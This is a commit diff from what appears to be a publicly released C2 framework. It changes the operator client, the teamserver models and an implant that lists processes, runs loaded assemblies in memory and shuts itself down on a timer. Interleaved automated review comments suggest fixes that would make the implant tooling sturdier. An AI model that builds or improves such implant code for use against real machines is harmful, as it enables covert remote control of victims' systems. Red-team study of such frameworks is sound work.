Public Release...finally. Probs riddled w/ bugs I missed but meh. Welp, here goes nothing

Gr1mmie 2022-03-19 21:09:14 -04:00
parent 22729f8b8d
commit f7a342e2f5
22 changed files with 111 additions and 75 deletions


@ -18,7 +18,6 @@ namespace APIModels.Requests
public class ImplantTaskRequest
{
public string Command { get; set; }
// json str, see alpha
public string Args { get; set; }
public string File { get; set; }
}


@ -18,7 +18,6 @@ namespace Client.Comms
using (StreamReader reader = new StreamReader(stream)) { return reader.ReadToEnd(); }
}
}
}
public static string SendPOST(string addr, string content){


@ -22,7 +22,6 @@ namespace Client.JSON
[Serializable]
public class ArgsData
{
//public string Taskname { get; set; }
public List<TaskArgs> Params { get; set; }
}
@ -32,7 +31,6 @@ namespace Client.JSON
public string Command { get; set; }
public string Args { get; set; }
public string File { get; set; }
//public byte[] File { get; set; }
}
[Serializable]
@ -42,7 +40,6 @@ namespace Client.JSON
public string Command { get; set; }
public string Args { get; set; }
public string File { get; set; }
//public byte[] File { get; set; }
}
@ -50,6 +47,8 @@ namespace Client.JSON
public class TaskRecvOut
{
public string Id { get; set; }
public string TaskName { get; set; }
public string TaskArgs { get; set; }
public string TaskOut { get;set; }
}


@ -2,8 +2,6 @@
{
class TaskOptions
{
// https://www.youtube.com/watch?v=C6lhpNkw6H4
public static object assemName = new AssemName();
public static object assemType = new AssemType();
public static object assemMethod = new AssemMethod();


@ -0,0 +1,22 @@
using System.Text;
using static Client.Models.Client;
namespace Client.Utils
{
class AdminTasks : Models.Util
{
public override string UtilName => "Admin";
public override string Desc => "List Admin tasks";
public override string UtilExecute(string[] opts)
{
StringBuilder _out = new StringBuilder();
if (_adminTask.Count == 0) { Init.OptInit(); }
foreach (Models.AdminTask admTask in _adminTask) { _out.AppendLine($"{admTask.TaskName,-25} {admTask.Desc}"); }
return _out.ToString();
}
}
}
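Review bot: `UtilExecute` here and the one in the `ClientUtil` class added by this commit are the same method apart from the collection they walk and the two property names, so a later fix to one is easy to miss in the other. A small shared helper on `Models.Util` that takes the rows to print would remove the copy. Both ignore `opts`; a comment such as `// opts is unused: this util takes no arguments` would show that is deliberate. `_out` is a local, and the underscore prefix makes it read like the `_adminTask` / `_utils` members that appear to come in through the `using static` import, so `output` would be clearer.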


@ -0,0 +1,22 @@
using System.Text;
using static Client.Models.Client;
namespace Client.Utils
{
class ClientUtil : Models.Util
{
public override string UtilName => "Utils";
public override string Desc => "List available utils";
public override string UtilExecute(string[] opts)
{
StringBuilder _out = new StringBuilder();
if (_utils.Count == 0) { Init.OptInit(); }
foreach (Models.Util util in _utils) { _out.AppendLine($"{util.UtilName,-25} {util.Desc}"); }
return _out.ToString();
}
}
}


@ -1,5 +1,4 @@
using System;
using System.Text;
using System.Text;
using System.Linq;
using Client.Models;
@ -24,8 +23,6 @@ namespace Client.Utils
var implantName = opts[1];
var _implant = ImplantList.FirstOrDefault(implant => implant.Equals(implantName));
if (_implant is null) { throw new AtlasException($"[-] Implant {implantName} does not exist"); }
//TaskOps.sendAdminUtil("KillSwitch");
Comms.comms.SendDELETE($"{TeamServerAddr}/Implants/{implantName}");


@ -38,7 +38,7 @@ namespace Client.Utils
}
catch (AtlasException e) { return e.Message; }
//catch (System.Net.WebException) { return $"[-] Connection to teamserver could not be established, verify teamserver is active\n"; }
catch (System.Net.WebException) { return $"[-] Connection to teamserver could not be established, verify teamserver is active\n"; }
}
}
}


@ -1,11 +1,8 @@
using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;
using System.Threading.Tasks;
using System.Text;
using Client.Models;
using static Client.JSON.Classes;
using static Client.Models.Client;
namespace Client.Utils.ImplantUtils
@ -21,17 +18,24 @@ namespace Client.Utils.ImplantUtils
{
try
{
if (opts is null) { throw new AtlasException($"[-] No parameters passed\nUsage: TaskOut [taskId]\n"); }
if (opts.Length > 2) { throw new AtlasException($"[*] Incorrect parameters passed\nUsage: TaskOut [taskId]\n"); }
if (opts is null) { throw new AtlasException($"[*] Usage: TaskOut [taskId]\n"); }
if (opts.Length > 2) { throw new AtlasException($"[*] Usage: TaskOut [taskId]\n"); }
taskId = opts[1];
StringBuilder _out = new StringBuilder();
var taskOut = Comms.comms.SendGET($"{TeamServerAddr}/Implants/{CurrentImplant}/{taskId}");
var parsedTaskOut = JSONOps.ReturnTaskData(taskOut);
string taskOut = Comms.comms.SendGET($"{TeamServerAddr}/Implants/{CurrentImplant}/tasks/{taskId}")
.Replace("\\\\\"", "\"");
TaskRecvOut parsedTaskOut = JSONOps.ReturnTaskData(taskOut);
ArgsRecv parsedArgs = JSONOps.ReturnTaskArgs(parsedTaskOut.TaskArgs);
_out.AppendLine(parsedTaskOut.TaskOut);
_out.AppendLine($"TaskName: {parsedTaskOut.TaskName}");
if (parsedArgs != null) {
_out.AppendLine($"\nParams:");
foreach (TaskArgs param in parsedArgs.Params) { _out.AppendLine($"\t{param.OptionName} - {param.OptionValue}"); }
}
_out.AppendLine($"Output:\n{parsedTaskOut.TaskOut}");
return _out.ToString();
}
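Review bot: The guard `opts.Length > 2` still lets a one-element array through, so `taskId = opts[1]` throws IndexOutOfRangeException when `TaskOut` is entered without an id; whether that is handled depends on catch clauses outside this hunk. Testing `if (opts is null || opts.Length != 2)` would send both cases to the usage message. `taskId` is typed input that goes into the URL path as-is, and `Uri.EscapeDataString(taskId)` would keep a `/` or `?` in it from changing which endpoint is requested. The `.Replace(...)` on the raw response rewrites escape sequences before the JSON parser sees them, which can corrupt a body whose strings legitimately contain that sequence. If `TaskArgs` arrives double-encoded, deserializing it a second time is the safer route.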


@ -1,7 +1,4 @@
using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;
using System.Text;
using Newtonsoft.Json;
@ -28,14 +25,13 @@ namespace Client.Utils.ImplantUtils
var tasks = Comms.comms.SendGET($"{TeamServerAddr}/Implants/{CurrentImplant}/tasks").TrimStart('[').TrimEnd(']');
if (tasks.Length == 0) { throw new AtlasException("[*] No tasks to view\n"); }
if (tasks.Contains("},{")) { tasks = tasks.Replace("},{", "}&{"); }
if (tasks.Contains("},{\"id")) { tasks = tasks.Replace("},{\"id", "}&{\"id"); }
var taskList = tasks.Split('&');
foreach (var _task in taskList)
{
foreach (var _task in taskList) {
taskData = JsonConvert.DeserializeObject<JSON.Classes.TaskRecvOut>(_task);
_out.AppendLine($"{taskData.Id} {TaskName}");
_out.AppendLine($"{taskData.Id} {taskData.TaskName}");
}
return _out.ToString();
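Review bot: Splitting the response by hand (`TrimStart('[')`, the `},{"id` to `}&{"id` replace, then `Split('&')`) breaks as soon as any field contains `&`. The task output and arguments are arbitrary text reported by a remote host, so the content of a record can change how the list is cut up and a fragment then fails to deserialize. Let the parser handle the array on the untrimmed body instead: `var taskList = JsonConvert.DeserializeObject<JSON.Classes.TaskRecvOut[]>(body) ?? new JSON.Classes.TaskRecvOut[0];`, with the empty check becoming `taskList.Length == 0`. The enclosing method starts and ends outside the hunk.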


@ -25,6 +25,7 @@ namespace Client.Utils
StringBuilder _out = new StringBuilder();
if (opts is null) { throw new AtlasException($"[*] Usage: StartListener [ListenerName] [ListenerPort]\n"); }
if(opts.Length > 3 || opts.Length < 3) { throw new AtlasException($"[*] Usage: StartListener [ListenerName] [ListenerPort]\n"); }
ListenerName = opts[1];
ListenerPort = Int32.Parse(opts[2]);


@ -12,7 +12,8 @@ namespace Client.Utils
public override string AdminUtilExec(string[] opts)
{
try {
var resp = TaskOps.sendAdminUtil("KillSwitch");
TaskOps.sendAdminUtil("KillSwitch");
Models.Client.CurrentImplant = null;
return "";
} catch (System.Net.WebException) { throw new Exception($"Implant successfully shutdown"); }
}
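Review bot: The `catch (System.Net.WebException)` branch still reports `Implant successfully shutdown` for every transport error, so a request that never reached the server is presented as a success. The new `Models.Client.CurrentImplant = null;` is skipped on that path, which leaves the two outcomes inconsistent. If the request is now expected to complete normally (the other side of this commit defers its exit), the catch should report the failure, e.g. `catch (System.Net.WebException e) { return $"[-] KillSwitch request failed: {e.Message}\n"; }`. Throwing the base `Exception` type also means the `catch (AtlasException e)` pattern used by the other utils on this page will not see it.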


@ -14,11 +14,15 @@ namespace Client.Utils
{
try
{
string Proc;
if (opts != null && opts.Length > 1) { throw new AtlasException($"[*] Usage: Ps\n"); }
if (opts != null && opts.Length > 2) { throw new AtlasException($"[*] Usage: Ps <procName>\n"); }
if (CurrentImplant is null) { throw new AtlasException("[-] No connected implant"); }
Proc = opts[1];
return TaskOps.sendAdminUtil(TaskName);
if (Proc != null) { return TaskOps.sendAdminUtil(TaskName, Proc); }
else { return TaskOps.sendAdminUtil(TaskName); }
}
catch (AtlasException e) { return e.Message; }
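Review bot: `Proc = opts[1];` runs unconditionally, so the plain `Ps` form, where `opts` is null or holds only the command name, throws NullReferenceException or IndexOutOfRangeException before the `else` branch can be reached. Neither is an `AtlasException`, so the catch shown here does not turn it into a message. Reading the optional argument conditionally fixes it: `string Proc = (opts != null && opts.Length == 2) ? opts[1] : null;`. The remaining catch clauses and the end of the method are outside the hunk.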


@ -1,15 +0,0 @@
using System.Collections.Generic;
using static Client.Models.TaskOptions;
namespace Client.Utils
{
class PSLoad : Models.Task
{
public override string TaskName => "PSLoad";
public override string Desc => "Load a PowerShell file into the implant process";
public override List<object> OptList { get; } = new List<object> { psFile };
}
}


@ -216,13 +216,11 @@ namespace Client.Utils
}
public static Classes.TaskSendOut ReturnTaskID(string taskresp) {
return JsonConvert.DeserializeObject<Classes.TaskSendOut>(taskresp);
}
public static Classes.TaskSendOut ReturnTaskID(string taskresp) { return JsonConvert.DeserializeObject<Classes.TaskSendOut>(taskresp); }
public static Classes.TaskRecvOut ReturnTaskData(string taskOut) {
return JsonConvert.DeserializeObject<Classes.TaskRecvOut>(taskOut);
}
public static Classes.TaskRecvOut ReturnTaskData(string taskOut) { return JsonConvert.DeserializeObject<Classes.TaskRecvOut>(taskOut); }
public static Classes.ArgsRecv ReturnTaskArgs(string taskArgs) { return JsonConvert.DeserializeObject<Classes.ArgsRecv>(taskArgs); }
public static string PackStartListenerData(string name, int port)
{
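Review bot: `ReturnTaskArgs` hands `taskArgs` straight to `JsonConvert.DeserializeObject`, which throws ArgumentNullException on a null string. A task record with no `TaskArgs` therefore fails before the caller's `parsedArgs != null` check (in the TaskOut util changed by this commit) can apply. Returning null for missing input keeps that check meaningful: `return string.IsNullOrEmpty(taskArgs) ? null : JsonConvert.DeserializeObject<Classes.ArgsRecv>(taskArgs);`. A one-line `///` summary on each of the three helpers saying that a JSON `null` body yields a null result would also help, since the call sites visible on this page do not guard `parsedTaskOut`.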


@ -3,6 +3,8 @@
public class ImplantTaskOut
{
public string Id { get; set; }
public string TaskName { get; set; }
public string TaskArgs { get; set; }
public string TaskOut { get; set; }
}
}


@ -34,8 +34,8 @@ namespace Implant
proc.Dispose();
}
public static void SendTaskOut(string _id, string _out) {
var taskOut = new ImplantTaskOut { Id = _id, TaskOut = _out };
public static void SendTaskOut(ImplantTask task, string _id, string _out) {
var taskOut = new ImplantTaskOut { Id = _id, TaskName = task.Command, TaskArgs = task.Args,TaskOut = _out };
_comms.DataSend(taskOut);
}
@ -45,9 +45,9 @@ namespace Implant
try
{
var _out = command.Execute(task);
SendTaskOut(task.Id, _out);
SendTaskOut(task, task.Id, _out);
} catch (Exception e) {
SendTaskOut(task.Id, e.Message);
SendTaskOut(task, task.Id, e.Message);
}
}


@ -1,4 +1,5 @@
using System;
using System.Timers;
using Implant.Models;
@ -11,8 +12,15 @@ namespace Implant.Tasks.Execute
public override string Execute(ImplantTask task)
{
Environment.Exit(0);
return $"Implant Shutdown";
Timer timer = new Timer();
timer.Interval = 5000;
timer.AutoReset = false;
timer.Elapsed += SelfDestruct;
timer.Start();
return "";
}
private static void SelfDestruct(object sender, ElapsedEventArgs e) { Environment.Exit(0); }
}
}


@ -22,8 +22,6 @@ namespace Implant.Tasks.Execute
var procs = Process.GetProcesses();
// if(task.Args != null) { procs = Process.GetProcesses(task.Args); }
procIDLen = psParse.getMaxProcIDLen(procs);
procNameLen = psParse.getMaxProcNameLen(procs) + procIDLen;
procSessionIDLen = psParse.getMaxProcSessionIDLen(procs) + procNameLen;
@ -33,7 +31,14 @@ namespace Implant.Tasks.Execute
_out.AppendLine($"{"---".Align(procIDLen)} {"--------".Align(procNameLen)} {"---------".Align(procSessionIDLen)}");
foreach (var proc in procs){
_out.AppendLine($"{proc.Id.Align(procIDLen)} {proc.ProcessName.Align(procNameLen)} {proc.SessionId.Align(procSessionIDLen)}");
if(task.Args != null && proc.ProcessName == task.Args) {
_out.AppendLine($"{proc.Id.Align(procIDLen)} {proc.ProcessName.Align(procNameLen)} " +
$"{proc.SessionId.Align(procSessionIDLen)}");
}
if (task.Args == null) {
_out.AppendLine($"{proc.Id.Align(procIDLen)} {proc.ProcessName.Align(procNameLen)} " +
$"{proc.SessionId.Align(procSessionIDLen)}");
}
}
_out.AppendLine();


@ -1,12 +1,8 @@
using System;
using System.Collections.Generic;
using System.Linq;
using System.IO;
using System.Net;
using System.Reflection;
using System.Text;
using System.Threading;
using static System.Console;
namespace Implant.Tasks.Execute
{
@ -17,20 +13,16 @@ namespace Implant.Tasks.Execute
// would be cool if these could be called from a yaml or something
// load assems into running process for expansion of implant capability (done)
// create task to list loaded assems(see utils) and their methods for operator viewing (done) and allow operator to pass assem + method into
// task to execute given method from assem
private static Assembly GetAssemblyByName(string assemName){
return AppDomain.CurrentDomain.GetAssemblies().FirstOrDefault(assem => assem.GetName().Name == assemName);
}
public static string ExecuteAssemEP(string assemName, string parameters){
var snapshotOut = Console.Out;
var snapshotErr = Console.Error;
TextWriter snapshotOut = Console.Out;
TextWriter snapshotErr = Console.Error;
var memStream = new MemoryStream();
var streamWriter = new StreamWriter(memStream) { AutoFlush = true };
MemoryStream memStream = new MemoryStream();
StreamWriter streamWriter = new StreamWriter(memStream) { AutoFlush = true };
Console.SetOut(streamWriter);
Console.SetError(streamWriter);


@ -3,6 +3,8 @@
public class ImplantTaskOut
{
public string Id { get; set; }
public string TaskName { get; set; }
public string TaskArgs { get; set; }
public string TaskOut { get; set; }
}
}


@ -13,4 +13,6 @@
<ProjectReference Include="..\APIModels\APIModels.csproj" />
</ItemGroup>
<ProjectExtensions><VisualStudio><UserProperties properties_4launchsettings_1json__JsonSchema="" /></VisualStudio></ProjectExtensions>
</Project>